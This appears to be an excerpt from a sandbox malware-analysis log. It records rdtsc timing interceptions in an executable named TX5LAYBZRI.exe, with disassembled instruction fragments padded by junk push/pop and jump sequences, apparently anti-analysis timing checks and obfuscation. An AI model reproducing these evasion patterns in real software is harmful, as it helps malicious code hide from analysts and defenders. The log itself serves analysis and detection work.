Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 79501FE second address: 795029F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF108C7BF0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b call dword ptr [75980B60h] 0x00000011 mov eax, 75F3E5E0h 0x00000016 ret 0x00000017 jmp 00007FF108C7BF16h 0x0000001c push 00000044h 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007FF108C7BF0Eh 0x00000025 add ecx, 075451B8h 0x0000002b jmp 00007FF108C7BF0Bh 0x00000030 popfd 0x00000031 jmp 00007FF108C7BF18h 0x00000036 popad 0x00000037 pop edi 0x00000038 jmp 00007FF108C7BF10h 0x0000003d xchg eax, edi 0x0000003e pushad 0x0000003f movzx eax, di 0x00000042 mov bx, 90DEh 0x00000046 popad 0x00000047 push eax 0x00000048 pushad 0x00000049 mov ah, 31h 0x0000004b mov dl, 1Fh 0x0000004d popad 0x0000004e xchg eax, edi 0x0000004f push eax 0x00000050 push edx 0x00000051 push eax 0x00000052 push edx 0x00000053 jmp 00007FF108C7BF10h 0x00000058 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 795029F second address: 79502A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 79502A3 second address: 79502A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 79502A9 second address: 79502BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF10887397Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 79502BA second address: 79502BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 795039F second address: 79503C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edi 0x00000005 jmp 00007FF10887397Dh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d je 00007FF176852C6Ah 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov cx, 43D5h 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 79503C2 second address: 79503E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF108C7BF0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub eax, eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FF108C7BF11h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 79503E8 second address: 79503FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF108873981h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 79503FD second address: 7950464 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF108C7BF11h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi], edi 0x0000000b jmp 00007FF108C7BF0Eh 0x00000010 mov dword ptr [esi+04h], eax 0x00000013 jmp 00007FF108C7BF10h 0x00000018 mov dword ptr [esi+08h], eax 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007FF108C7BF0Eh 0x00000022 sbb ecx, 664427C8h 0x00000028 jmp 00007FF108C7BF0Bh 0x0000002d popfd 0x0000002e popad 0x0000002f mov dword ptr [esi+0Ch], eax 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 7950464 second address: 7950468 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 7950468 second address: 795046E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 795046E second address: 7950523 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, eax 0x00000005 mov cx, 5627h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [ebx+4Ch] 0x0000000f jmp 00007FF10887397Ah 0x00000014 mov dword ptr [esi+10h], eax 0x00000017 pushad 0x00000018 call 00007FF10887397Eh 0x0000001d mov bx, cx 0x00000020 pop eax 0x00000021 pushfd 0x00000022 jmp 00007FF108873987h 0x00000027 or ax, 18CEh 0x0000002c jmp 00007FF108873989h 0x00000031 popfd 0x00000032 popad 0x00000033 mov eax, dword ptr [ebx+50h] 0x00000036 jmp 00007FF10887397Eh 0x0000003b mov dword ptr [esi+14h], eax 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 pushfd 0x00000042 jmp 00007FF10887397Dh 0x00000047 and ecx, 787E73B6h 0x0000004d jmp 00007FF108873981h 0x00000052 popfd 0x00000053 jmp 00007FF108873980h 0x00000058 popad 0x00000059 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 7950523 second address: 795053B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF108C7BF0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+54h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 795053B second address: 795053F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 795053F second address: 795055A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF108C7BF17h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 795055A second address: 7950625 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF10887397Fh 0x00000009 xor ah, FFFFFFFEh 0x0000000c jmp 00007FF108873989h 0x00000011 popfd 0x00000012 movzx esi, bx 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov dword ptr [esi+18h], eax 0x0000001b jmp 00007FF108873983h 0x00000020 mov eax, dword ptr [ebx+58h] 0x00000023 pushad 0x00000024 mov esi, 77E23F4Bh 0x00000029 movzx esi, bx 0x0000002c popad 0x0000002d mov dword ptr [esi+1Ch], eax 0x00000030 jmp 00007FF108873983h 0x00000035 mov eax, dword ptr [ebx+5Ch] 0x00000038 jmp 00007FF108873986h 0x0000003d mov dword ptr [esi+20h], eax 0x00000040 pushad 0x00000041 movzx esi, bx 0x00000044 mov ecx, edi 0x00000046 popad 0x00000047 mov eax, dword ptr [ebx+60h] 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d jmp 00007FF10887397Eh 0x00000052 pushfd 0x00000053 jmp 00007FF108873982h 0x00000058 and cx, A448h 0x0000005d jmp 00007FF10887397Bh 0x00000062 popfd 0x00000063 popad 0x00000064 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 7950625 second address: 7950676 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, si 0x00000006 jmp 00007FF108C7BF10h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esi+24h], eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov ecx, edx 0x00000016 pushfd 0x00000017 jmp 00007FF108C7BF19h 0x0000001c xor al, FFFFFFC6h 0x0000001f jmp 00007FF108C7BF11h 0x00000024 popfd 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 79507B4 second address: 79507C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF10887397Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 79507C3 second address: 79507E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, ebx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+0000008Ch] 0x0000000e jmp 00007FF108C7BF0Ch 0x00000013 mov dword ptr [esi+34h], eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 79507E6 second address: 79507EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 79507EA second address: 79507F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 79507F0 second address: 7950824 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF108873984h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+18h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF108873987h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 7950824 second address: 795083C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF108C7BF14h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 795083C second address: 7950856 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF10887397Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+38h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 7950856 second address: 795085A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 795085A second address: 7950860 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 7950860 second address: 7950896 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF108C7BF14h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebx+1Ch] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FF108C7BF17h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 7950896 second address: 7950915 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF108873989h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+3Ch], eax 0x0000000c jmp 00007FF10887397Eh 0x00000011 mov eax, dword ptr [ebx+20h] 0x00000014 pushad 0x00000015 mov bx, cx 0x00000018 mov cx, 98D9h 0x0000001c popad 0x0000001d mov dword ptr [esi+40h], eax 0x00000020 jmp 00007FF108873984h 0x00000025 lea eax, dword ptr [ebx+00000080h] 0x0000002b pushad 0x0000002c movzx eax, dx 0x0000002f mov edi, 618987FEh 0x00000034 popad 0x00000035 push 00000001h 0x00000037 jmp 00007FF108873985h 0x0000003c nop 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 7950915 second address: 7950919 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 7950919 second address: 795092C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF10887397Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 795092C second address: 7950984 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, ebx 0x00000005 call 00007FF108C7BF0Bh 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jmp 00007FF108C7BF16h 0x00000014 nop 0x00000015 jmp 00007FF108C7BF10h 0x0000001a lea eax, dword ptr [ebp-10h] 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FF108C7BF17h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 7950A05 second address: 7950A0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 7950A0B second address: 7950A0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 7950A0F second address: 7950A33 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF108873986h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov edi, eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 7950A33 second address: 7950A39 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 7950A39 second address: 7950A6C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 1B99C361h 0x00000008 pushfd 0x00000009 jmp 00007FF10887397Eh 0x0000000e xor eax, 076B71F8h 0x00000014 jmp 00007FF10887397Bh 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d test edi, edi 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 push esi 0x00000023 pop edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 7950A6C second address: 7950AD4 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FF108C7BF0Eh 0x00000008 or cx, 4C58h 0x0000000d jmp 00007FF108C7BF0Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 mov dl, 7Bh 0x00000018 popad 0x00000019 popad 0x0000001a js 00007FF176C5AB34h 0x00000020 pushad 0x00000021 movzx ecx, dx 0x00000024 push edi 0x00000025 push eax 0x00000026 pop edi 0x00000027 pop eax 0x00000028 popad 0x00000029 mov eax, dword ptr [ebp-0Ch] 0x0000002c jmp 00007FF108C7BF0Dh 0x00000031 mov dword ptr [esi+04h], eax 0x00000034 pushad 0x00000035 movzx eax, dx 0x00000038 mov ebx, 25C43E2Ch 0x0000003d popad 0x0000003e lea eax, dword ptr [ebx+78h] 0x00000041 push eax 0x00000042 push edx 0x00000043 pushad 0x00000044 pushad 0x00000045 popad 0x00000046 jmp 00007FF108C7BF0Ah 0x0000004b popad 0x0000004c rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 7950AD4 second address: 7950B32 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF10887397Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 00000001h 0x0000000b pushad 0x0000000c jmp 00007FF108873984h 0x00000011 push esi 0x00000012 pushad 0x00000013 popad 0x00000014 pop ebx 0x00000015 popad 0x00000016 nop 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a mov si, di 0x0000001d pushfd 0x0000001e jmp 00007FF10887397Bh 0x00000023 or si, F7EEh 0x00000028 jmp 00007FF108873989h 0x0000002d popfd 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 7950B32 second address: 7950B52 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 004C3B02h 0x00000008 push edx 0x00000009 pop esi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FF108C7BF0Eh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 7950B52 second address: 7950B56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 7950B56 second address: 7950B5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 7950B5C second address: 7950B80 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF10887397Ch 0x00000009 xor eax, 3E5C19C8h 0x0000000f jmp 00007FF10887397Bh 0x00000014 popfd 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 7950B80 second address: 7950BAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 jmp 00007FF108C7BF14h 0x0000000d lea eax, dword ptr [ebp-08h] 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FF108C7BF0Ah 0x00000019 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 7950BAD second address: 7950BB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 7950BB1 second address: 7950BB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 7950BB7 second address: 7950BBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 7950BBD second address: 7950BC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 7950BC1 second address: 7950BE6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF108873988h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 7950BE6 second address: 7950BEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 7950BEA second address: 7950C07 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF108873989h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 7950C07 second address: 7950C17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF108C7BF0Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 7950C17 second address: 7950C1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 7950C1B second address: 7950C33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FF108C7BF0Dh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 7950C33 second address: 7950CA5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF108873987h 0x00000009 sbb esi, 77D82E3Eh 0x0000000f jmp 00007FF108873989h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 nop 0x00000019 pushad 0x0000001a mov edi, 24DBA39Eh 0x0000001f push eax 0x00000020 push edx 0x00000021 pushfd 0x00000022 jmp 00007FF108873985h 0x00000027 adc cl, 00000026h 0x0000002a jmp 00007FF108873981h 0x0000002f popfd 0x00000030 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 7950CFF second address: 7950D03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 7950D03 second address: 7950D09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 7950D09 second address: 7950D7E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FF108C7BF12h 0x00000008 pop esi 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e js 00007FF176C5A89Bh 0x00000014 jmp 00007FF108C7BF17h 0x00000019 mov eax, dword ptr [ebp-04h] 0x0000001c jmp 00007FF108C7BF16h 0x00000021 mov dword ptr [esi+08h], eax 0x00000024 jmp 00007FF108C7BF10h 0x00000029 lea eax, dword ptr [ebx+70h] 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007FF108C7BF0Ah 0x00000035 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 7950D7E second address: 7950D8D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF10887397Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 7950D8D second address: 7950DFF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop esi 0x00000005 mov si, bx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push 00000001h 0x0000000d jmp 00007FF108C7BF0Dh 0x00000012 nop 0x00000013 jmp 00007FF108C7BF0Eh 0x00000018 push eax 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007FF108C7BF0Ch 0x00000020 sbb ch, 00000068h 0x00000023 jmp 00007FF108C7BF0Bh 0x00000028 popfd 0x00000029 popad 0x0000002a nop 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e mov ah, dl 0x00000030 pushfd 0x00000031 jmp 00007FF108C7BF0Ch 0x00000036 jmp 00007FF108C7BF15h 0x0000003b popfd 0x0000003c popad 0x0000003d rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 7950DFF second address: 7950E2E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF108873981h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-18h] 0x0000000c jmp 00007FF10887397Eh 0x00000011 nop 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push edi 0x00000016 pop eax 0x00000017 mov dh, 4Ah 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 7950E2E second address: 7950E40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF108C7BF0Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe RDTSC instruction interceptor: First address: 7950E40 second address: 7950E58 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF10887397Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f mov cx, dx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7950EAF second address: 7950ED8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF108C7BF19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edi, eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov bx, 799Eh 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7950ED8 second address: 7950F09 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF108873982h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edi, edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FF108873987h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7950F09 second address: 7950F32 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF108C7BF19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007FF176C5A68Fh 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7950F32 second address: 7950F36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7950F36 second address: 7950F3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7950F3A second address: 7950F40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7950F40 second address: 7950F46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7950F46 second address: 7950F4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7950F4A second address: 7950F75 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebp-14h] 0x0000000b jmp 00007FF108C7BF18h 0x00000010 mov ecx, esi 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
